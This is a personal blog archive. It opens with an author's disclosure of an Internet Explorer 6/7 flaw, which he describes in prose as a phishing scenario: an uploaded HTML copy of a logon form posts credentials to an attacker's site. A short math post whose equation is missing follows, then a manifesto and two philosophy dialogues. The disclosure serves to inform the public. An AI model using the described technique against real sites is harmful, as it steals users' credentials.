Vulnerability in Windows Internet Explorer 6 & 7

Almost a month ago, I reported this vulnerability to Microsoft, and they came back and confirmed it was a problem, but then came back and said “It’s no big deal, we’ll fix it in the next release”.

Microsoft has this track record with me of saying “It’s no big deal”, and then later making it a big deal, and never giving me credit for helping them. So I told them I was bringing this one public if they really thought it was no big deal, then no harm done… – they never asked me not to…

So I tried posting it to bugtraq – 24 hours after my first post didn’t show up, I reposted with a second account, thinking that the first post was blocked because I used an email address that wasn’t subscribed – almost 15 hours later, and the second post hasn’t shown up – I’m begining to wonder if someone is blocking the post (for whatever reason).

I emailed the list owner, and no response and after about 18 hours no response… so I guess it’s up to me to just start posting the problem around on the internet to get the word out.

I’ve tried posting this thread on two different security forums, and each forum throws an exception and doesn’t let me post… I think the world is out to squash Microsoft Internet Explorer Vulnerabilities….. at least I can post here!

This vulnerability may have limited destructive powers based on the current description that I’ve come up with, because of it requiring both the server owner and the client user to practice poor security habits – but isn’t that what the world is filled with – people that don’t practice safe security habits? It is also possible that someone else with more time on their hands can come up with other variants that would be a bit more destructive.

Web application Scenario:

1.Website accepts file uploads from users
2.Website follows recommended security for file uploads including two that are important to this discussion:
a.The document being uploaded is not stored in a directory that is accessible by Web Users (it is served up from a back end process when requested by users)
b.The users do not have execute permissions on the documents that are stored on the server (only permissions that are granted for download)

Attack scenario:

1.Attacker uploads HTML file to site
a.This HTML file contains:
i.Copy of logon form from the website, including relative pathing to website for cascading style sheets, images, etc.
ii.Attacker modifies form post location, so form posts go to a site the attacker controls
2.Website provides other users the ability based on their authorization to download and view the HTML file that the attacker uploads

IE Response:

1.Authenticated users click on HTML file and are presented with the download popup, file is streamed from a repository other than a web accessible location from the server
2.When prompted, users choose “Open” from the download popup, allowing default application to open the downloaded file
3.IE opens the HTML page in the current IE window (this has been verified against both IE 6 and IE 7), but IE does not change the security zone, or the URL of the IE address bar, so now the user sees the (modified) logon page of the site, but is given no indication (apart from opening and reviewing source code) that this page is not hosted on the site they are visiting
4.IE, thinking the HTML page has been served up from the remote site in the normal use case, also resolves all relative paths (cascading style sheets, images, etc) from the server
5.User – while thinking it odd that they are being prompted to logon again, looks and sees they are still in the same security zone, and URL of their trusted website
6.User logs on again (sending credentials to the attacker), and attacker does anything he wants with the post (serve up the actual file, redirect back to the original site, etc.)

Contrast IE’s response to FireFox’s response.

FireFox response:

1.Authenticated users click on HTML file and choose to download, when prompted, users choose “Open” for HTML file, allowing default application to open the downloaded file
2.Default browser (or alternate browser) opens the HTML page from local internet cache after download complete
3.Browser does not resolve relative paths, and URL is changed to show it’s running from a local location
4.Attack is obvious, User doesn’t proceed.

Perhaps I’ve missed something that makes this of no use to an attacker, and perhaps I’ve missed something that makes this an even bigger problem than I realized – but none-the-less, here it is.

r/Darth Jedi

James – here is your equation for your number sequence…

Let x equal the last number in the sequence

Let (the function of) F(x-1) equal the number right before the last number in the sequence

let (the function of) F(x-2) qual the number before the number right before the last

Let a = ((x)-(F(x-1)))

Let b = ((F(x-1)))-((F(x-2))))

Let c = the position of x in the sequence

Let d and e be a place holder for calculations

Let f = the next number in the sequence

So the equation is:




I’m sure there is a much more elegant way to write this out, but when I laid down in bed last night it popped into my head right before I fell asleep, so I figured i’d post it as a blog – so you could see it once you added me as a friend…

My Manifesto

From an early age, long before I was introduced to ideas like Descartes Method of Doubt, it has been my life’s goal to constantly question my own beliefs, question the teachings I have been given as a child, and to search for truth.

This quest has brought a lot of trouble and heart ache into my life, walking away from convictions that your friends and family hold to be true, because they are unsupportable and irrational can be a dark and lonely road, and yet, as was stated by Martin Luther when standing before the Church fathers at the Diet of Worms: “Unless I am convinced by holy scripture, or by evident reason… I cannot and will not recant, because acting against one’s conscience is neither safe nor sound” (Oberman, 2006).

Regardless of the problems in my life that the love of knowledge has caused, with this relentless drive in the pursuit of knowledge comes a greater appreciation and an awakened beauty, for each and every new concept that comes through and knocks down my world as I know it. As I grow and grasp, I am left with the sense of waking up on a summer’s morning inside of a hot and stuffy tent, unzipping the door and stepping out into fresh sunlight and to indescribable sights and sounds.

I will never cease to be awestruck through, in and around the world as it exists – I shall cling to the reformation motto of “Semper Reformanda” – and hope there never comes a time in my life that I am not ready, able and willing to learn and grow.

Philosophy to me is the foundation of my existence.

Dialogue on the problem of suffering

Once again, another philosophy assignment; who knows if anyone will read it, but I’m posting it anyway. 🙂

Joan: You know, Confucius, I’ve been thinking about your very first thought a little earlier in our conversation today; that humans “survive in adversity and perish in ease and comfort”. This statement really reminds me of one of my favorite movies, The Matrix. Do you remember The Matrix?

Confucius: Yep! Great movie! It was all about how humanity, while good, deep down inside needs to be challenged with difficulties. I loved it when the Oracle told Neo (who I believe to be an archetype of humanity itself) that he could only be truly free to save the world if he felt he was free to save the world. She compared his knowing if he was the one, to being in love: You either know it or you don’t. Of course, in the second movie we found out that the oracle told Neo exactly what he needed to hear to get him to go out and face his adversity to become a better person. So Neo had to be challenged with difficulties to become a better person.

Joan: You know, that’s an interesting take on the movie, but my take is a bit different. I think Neo had to do a lot of soul searching, he had to grow as an inner person, to experience love for another human being, to put his life on the line for that human being, so that adversity didn’t give him personal growth – it gave him spiritual growth.

Confucius: Hmmm, well we clearly disagree on that facet of the movie.

Joan: But that’s not really my point of bringing it up. Back at your original statement that humanity “survives in adversity and perishes in ease and comfort”, that reminds me of something Agent Smith said in that movie:

Joan mimics that articulation and drawl of Agent Smith: Did you know that the first Matrix was designed to be a perfect human world? Where no one suffered, where everyone would be happy? It was a disaster. No one would accept the program. Entire crops were lost. Some believed we lacked the programming language to describe your perfect world. But I believe that, as a species, human beings define their reality through suffering and misery. The perfect world was a dream that your primitive cerebrum kept trying to wake up from. Which is why the Matrix was redesigned to this: the peak of your civilization (Wachowski & Wachowski, 1999).

Confucius: I guess I would agree with that; suffering produces the appropriate foundation for humanity to grow from existence to essence; I don’t think humanity could come to fully understand and appreciate its essence without first experiencing existence (and associated suffering), and therefore I don’t think mankind could be truly happy without some form of suffering.

Joan: You sound a bit like an existentialist!

Confucius: I say… I do!

Joan: Confucius says, he does!

Aquinas: Haha! I get it!

Job: But seriously though, both of you are splitting hairs really. You both believe that suffering is done to produce a certain result in those that are suffering. How would you respond to those people that say that there are cases of needless and pointless suffering in the world? It seems to me that that you can’t really speak to, and answer the question of suffering until you have walked a mile in someone’s shoes; that is until you have undergone unnecessary suffering, how can you speak to the problem of suffering?

Aquinas: Ok, Job; let’s hear what you have to say.

Job: Well, everyone knows my story. One day, I was sitting in the shade of my tent during the noon day glare, sipping a cup of tea, when all of a sudden one of my servant’s came to me and told me that all my oxen and donkey’s were plundered, and all my servants that were working the fields were killed, except the one that came to report to me.

Joan: Wow, that must have been really hard – that was your entirely livelihood wasn’t it?

Job: Nope, nah, I still had sheep. However, while my servant was still speaking, another came running in to tell me that in another section of my farmlands a fire from God fell from the sky burning up my sheep and servants, and only he escaped to tell me.

Confucius: Confucius says that really sucks.

Aquinas: Ok there buddy, it was funny the first time, don’t overdo it.

Joan: Wow, so then that was your entirely livelihood?

Job: Nope, I still had my camels. And yet, while the second servant was still talking a third came hurrying from a third corner of my farmlands to tell me that the Chaldeans had raided and took all my camels and had killed all my servants attending them, and he only escaped.

Joan: And that was it?

Job: That was it. And yet, I realized that God had given me everything that I owned, that He had provided those things of material value to me to begin with; so they were rightfully His, if he wanted to take them away, then so be it.

Aquinas: But that’s not all is it?

(Job begins to get teary, apparently wanting to leave this part out of the story)

Job: No, at that same exact time, another messenger came in to tell me that all my sons and daughters had just been killed when my oldest sons Fletcher’s house collapsed.

Joan: Oh God!

Job: That was my response.

(Job pauses to catch the lump that began to form in his throat from holding back the tears)

Job: I immediately when into deep morning and cried out to God saying: “Naked I came from my mother’s womb, and naked I will go back into the womb of the earth. God gives, and God takes. Blessed is God’s name.”

(Silence falls over the entire room, until Aquinas finally begins to speak)

Aquinas: I still can’t imagine what it must have been like; even hearing you talk about it now.

Job: Yes, but that wasn’t all, as if there couldn’t have been anymore insult to injury, a short while later I developed sores, ulcers and scabs that covered me from head to foot.

Joan: Wow, what did you do?

Job: What could I do? My wife told me to stop holding onto my integrity and to curse God and die. But I was, and still am a solid believer in the fact that if we can accept the good things that God gives to us, we must also accept the bad things that God gave to us as well.

Confucius: But, what was the purpose of it all?

Job: Well, let me finish my story. It’s in one of the number one sellers, my agent is ecstatic!), my so-called friends came around to try and comfort me.

(Job takes on a sarcastic tone)

Job: And what comfort they were. Mostly they just tried to convince me as to why all of this was probably my fault that God was punishing me for something that I had done, and probably just didn’t remember.

(Job sighs)

Job: I was upset with God, I really was. I mean, I was accepting of his decision, but I really wanted the ability to defend myself to God, and tell him why I was innocent and not guilty, and why I shouldn’t be punished.

(There is a slight pause, and Job shutters)

Job: And then, there came the answer.

Joan: You mean, God told you the reason for all of your suffering?

Job: Heck no! He stood me up in the middle of a violent storm, and told me to stand up straight, to brace myself, and listen to what He had to say and answer Him if I could. He put me to shame by showing me that I can’t even fathom some of the smallest portions of His creation, so who am I to question his goodness, mercy, judgment and righteousness. In the end, God’s only answer to me was God Himself.

Aquinas: Amen to that. You know Joan, Paul said the same thing in his letter to the Romans. I think it’s interesting that Job’s “book provides no answers to these questions. In the end, the reader is in the same position as Job himself. But in the end, the reader’s questions must be handled in the same that God handled Job’s questions. For like Job, we were not there when God laid the foundations of the earth. None of us knows who marked off its dimensions or stretched a measuring line across it. (Frame, 1994)

Joan: So really though, is it that God wants us to mature spiritually?

Confucius: Or does he want us to grow as a person?

Aquinas: I think the problem here, is, as John Frame points out in his book Apologetics to the Glory of God, that we are not being theocentric in our view of the problem of evil, rather we are being anthropocentric, and of course, that’s natural for us, as we see things from man’s point of view and not God’s. But, what I think we need to understand that God not only wants the greatest good for us, but He knows the greatest good for us too!

Job: This sounds like the greater-good theodicy!

Aquinas: In a way, but even deeper than that. I want each of you to go to and order the John M. Frame book that I’m mentioning, and read the chapter’s on the problem of evil. There is too much to explain right here, right now, but I will give you a quick overview.

(Keyboard clicking is heard in the background)

Aquinas: Just wait, please pay attention, Amazon isn’t going anywhere. In his book, John Frame says that we need to look at the problem of pain from a historical perspective.

First, we need to understand the past; and see that the past shows that God is good, merciful and just, and while we might not see the forest through the trees as we’re walking along in our life, God never takes his eyes off of us.

Next, we need to take a present view of pain and suffering, Paul tells us in Romans that God never allows any evil to come about to anyone who loves him, without it working for the greater good.

And finally, we have to take a future view of pain and suffering. There are still, and will continue to be outstanding questions on the goodness and mercy and justice of God, because we can’t see the end of everything. But, God has continued to show, over and over historically that He indeed will take care of us, if we love and trust Him, if we have Faith in Him.

Job: And that’s why I said that God’s answer to the problem of pain and suffering is Him. He says, I AM who I AM, trust me and have faith.

Aquinas: This I believe answers the question, in the end, to have faith in God is to have the answer to the question. I think it also starts to touch on the question of “Why the God Man”, but we’ve run out of time for today. I think I’ll write a book on that topic, it sounds very interesting.

Confucius: I think Anselm already beat you to that…

Joan: Confucius says…

Job: For crying out loud, I have to go, I’ll catch up with you guys later.

Aquinas: Ok, later!

Joan: Don’t forget dinner on Friday night!

Confucius: (Speechless)

Works Cited

Apologetics to the Glory of God. Phillipsburg: Presbyterian and Reformed Publishing Company.

Wachowski, A., & Wachowski, L. (Directors). (1999). The Matrix [Motion Picture].

Dialogue – Is Truth Relative?

This discussion takes place between 3 friends after a follow up discussion prior to dinner at the local pizza parlor.

Yang: Man, I’m really glad I’m full; it’s really hard to think on an empty stomach!

Paula: I agree!

Yang: That Pizza place is the best! There really is no other place that makes pizza as good as they do!

Paula: I disagree. I think that the pizza place on the other side of town is much, much better.

Mel: I think you’re both wrong; there is no better place than the little store we used to go to, when I was a kid. It’s still in business too; only it’s about 7 hours from here, so I don’t get to enjoy the pizza that often.

Paula: Once again, we see that beliefs are relative to the individual.

Yang: Paula, now that my hunger is satisfied I would like to pick back up where we were before dinner. But, this time, let’s get a little more serious. Before dinner we all came to the conclusion that beliefs are person relative, that is, each person holds their own belief, but that beliefs can also be true and objective.

Paula: Yes, I agreed to that, but I was hungry, and I just wanted to get something to eat, and I know you Yang, if I hadn’t agreed with you, you would have had us talking about it all night. You see, I still maintain, and want to underline that while beliefs are person relative, most truths are too.

Yang: If you are to take that position Paula, who is to say that your truth that states that most truths are relative isn’t itself relative? Then we’re right back to where I said we would be at the beginning: If a truth is relative, then it could be false, and a truth cannot be both true and false in at the same time in the same way, that violates the law of non-contradiction, so a truth is either true or false, but it can’t be both true and false.

Paula: See, that’s where we disagree, it’s not both true and false at the same time and in the same way, it’s different to each individual; it would only be true or false at the same time in the same way if truth was objective, which is a position by-in-large that I don’t support.

Mel: That’s a pretty interesting view Paula. Perhaps you can help Yang out, by defining what you believe truth is.

Paula: Well, I think truth is in the eyes of the beholder, for the most part. I mean, as you pointed out a while ago Professor, from your perspective, it is true that the moon is shining, but from a scientist’s perspective, the moon isn’t really shining, but it is reflecting.

Mel: Very good observation!

Paula: So, while you used that statement as an example of something that is objectively true, in reality it was subjectively true. So while you can say, from your perspective that the moon is shining, a scientist could just as rightly say, that it isn’t really shining, but it is reflecting.

Yang: But Paula, now you’re the one who is playing games with words and puzzles. If Mel had said: “It appears like the moon is shining tonight”, then that would be objectively true.

Paula: And yet, his statement would be person centric. If I was blind, I couldn’t agree with his statement that it appears like the moon is shining.

Yang: Ok, so what if Mel said: “It appears to me that the moon is shining”

Mel: Paula is right, this still suffers from the same problem, it is a statement that is obviously tied to my perception, and so does it not therefore seem to be relative to me?

Sophia: Hey Yang, Paula, Mel, how’s it going?

Mel: We’re doing well, except we’re in a pretty deep discussion about whether or not there is such a thing as objective truth.

Sophia: Wow that is deep!

Paula: Yes, but I think we were just about to wrap it up. We just agreed that any statement that I make is obviously tied to my perception, and because my perception is relative to me, then, any truth that I state is relative to me. And as a result, any truth that you state is also relative to you. So, because all truths are put forth by people, then truths are all relative, depending on the person that put it forth.

Sophia: Well, that is very interesting. Mel, what do you think about this statement that Paula just made?

Mel: It definitely has some truth to it!

Yang: Do you mean it definitely has some truth in it for everyone, or for just you? For me, it still doesn’t ring true, and if all truth is relative, that means, it isn’t true, because I say it isn’t!

Paula: Don’t start that again!

Sophia: Mel, let me ask you this question. Do you believe in God?

Paula: Mel already said yes.

Mel: Yes, I do, and I believe that this is a person-centric belief, but that it can also be true.

Paula: But how do we measure truth, except through perception, which is person centric, and therefore relative?

Sophia: Just a minute, let me continue. Mel, you believe in God, right? Now let me ask you this, does your belief in God make God real? What I mean is, if God isn’t real, can your belief in Him make Him become real?

Paula: Well, to Mel, He could be real or not real depending on whether Mel believes He is real.

Sophia: That’s not my question. Can Mel’s belief make God real, in actuality?

Yang: No, God either exists in actuality or doesn’t exist in actuality. What you believe about it is inconsequential.

Sophia: So, could we say, whether God exists or not, is an objective truth. Again, what I mean is that if God exists, then He exists in actuality, and if He doesn’t exist, then He doesn’t exist in actuality. And therefore, God’s existence is either objectively true, or objectively false, but either way, it’s objective. It doesn’t matter what your belief is on this question, it is either true in actuality or not true in actuality.

Mel: Yes, that’s a great point. So, at least in the case of God, there is objective truth as to whether He exists or not.

Sophia: Paula?

Paula: Ok, I see what you’re saying; my belief about the existence of God, while being subjective to me, in reality is being held to a standard of truth that is outside of me, that is, it is being held to actuality?

Sophia: Exactly!

Mel: What if we don’t agree on what God is?

Yang: Oh brother, here we go again.

Paula: Seriously though, aren’t we then tied to our perception of God to answer this question? And we’ve already stated that perception is person-centric; so therefore the answer of the belief of God is relative to the person answering the question. I could think God is a tree, or a spirit, or a word, or a breath, or I could define God as that which doesn’t exist, so then my definition of God, is that which doesn’t exist.

Sophia: Ok, let’s get even more basic. I say that I have a rock in my hand.

(Sophia holds up her hand)

Now, let’s vote, who thinks that I have a rock in my hand?

Mel: I do.

Yang: I don’t.

Paula: I don’t either.

Sophia: Ok, so, does whether you believe that I have a rock in my hand or not change the fact that I have a rock in my hand or not? Can your belief, person-centric as it is, affect actuality?

Paula: No, I suppose not, so then we’re right back to the same point we were at right before dinner, all belief is subjective, but some belief is true.

Yang: I think there is one important thing we have learned though….

Paula: What’s that?

Yang: Well, for one thing, there is at least one truth that is objectively true, so we can certainly no longer say that “All truth is relative”.

Paula: Yes, but I would still say that most truth is relative.

Sophia: However, let me change my last question to be a little different, and let’s see how your answer might change. Let’s say, for arguments sake, that I am omniscient, that is, I know everything. Now, ask me a question, any question!

Yang: Is there such thing as objective truth?

(Yang gets this evil grin on his face)

Sophia: Tricky, tricky! Ok, so that’s your question, “Is there such thing as objective truth”. Now, answer your own question, please.

Yang: I still say there is.

Mel: I’m pretty sure there is.

Paula: I don’t think so.

Sophia: Now here is the catch, all three of you have your beliefs, and yet, in order to have your beliefs, you must presuppose that your belief is valid on each other. Yang, if you say that there is objective truth, then you are binding Paula with that statement. Paula, even when you say there is no objective truth, you are binding Yang to that statement, by saying that Yang can’t hold you to an objective standard, because there is a standard that says there is no standard. So, in either case, you are both asserting there is an objective truth that stands outside of your person-centric perception. In order to argue whether there is objective truth or not, you both need to appeal to something outside of yourself.

Paula: Wow, I guess I never really thought of it that way.

Mel: So what you are saying is, the fact that we are arguing as to whether or not there is objective truth means that we are appealing to something outside of ourselves as the arbitrator to the answer of the question of objective truth?

Sophia: Exactly right. And here is the final thing to leave you to think about. I am not going to tell you whether or not I have a rock in my hand. So while there is an objective truth, each of you will continue to believe what you believe based on your own person-centric perception.

Paula: So, to sum up what you are saying: There is such thing as an objective standard for everything, but, as humans that rely on our perceptions, we may not be able to always understand or articulate what that objective truth is?

Sophia: You’ve got it.

Yang: So, someone out there knows the best pizza place then!

Paula: You are a piece of work….

Exit mobile version